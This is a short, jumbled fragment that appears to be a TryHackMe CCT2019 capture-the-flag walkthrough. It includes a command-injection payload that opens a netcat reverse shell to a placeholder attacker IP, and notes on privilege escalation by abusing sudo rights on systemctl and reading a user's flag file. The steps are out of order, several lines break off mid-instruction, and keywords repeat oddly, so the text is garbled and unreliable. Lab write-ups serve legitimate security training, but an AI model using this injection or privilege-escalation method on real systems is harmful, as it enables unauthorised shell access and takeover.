Tryhackme !!better!! — Cct2019

127.0.0.1; nc -e /bin/sh <your_ip> 4444 If -e not available, use:

Often in CCT2019, mandy can run python as root:

User www-data may run (ALL, !root) /bin/systemctl That means www-data can run systemctl as any user . 4.2 Exploit systemctl Create a service file (e.g., privesc.service ): cct2019 tryhackme

cat /home/mandy/user.txt Check sudo -l again as mandy – maybe mandy can run something as root.

Test for :

ls -la /home Found user: mandy

Read user.txt :

Run: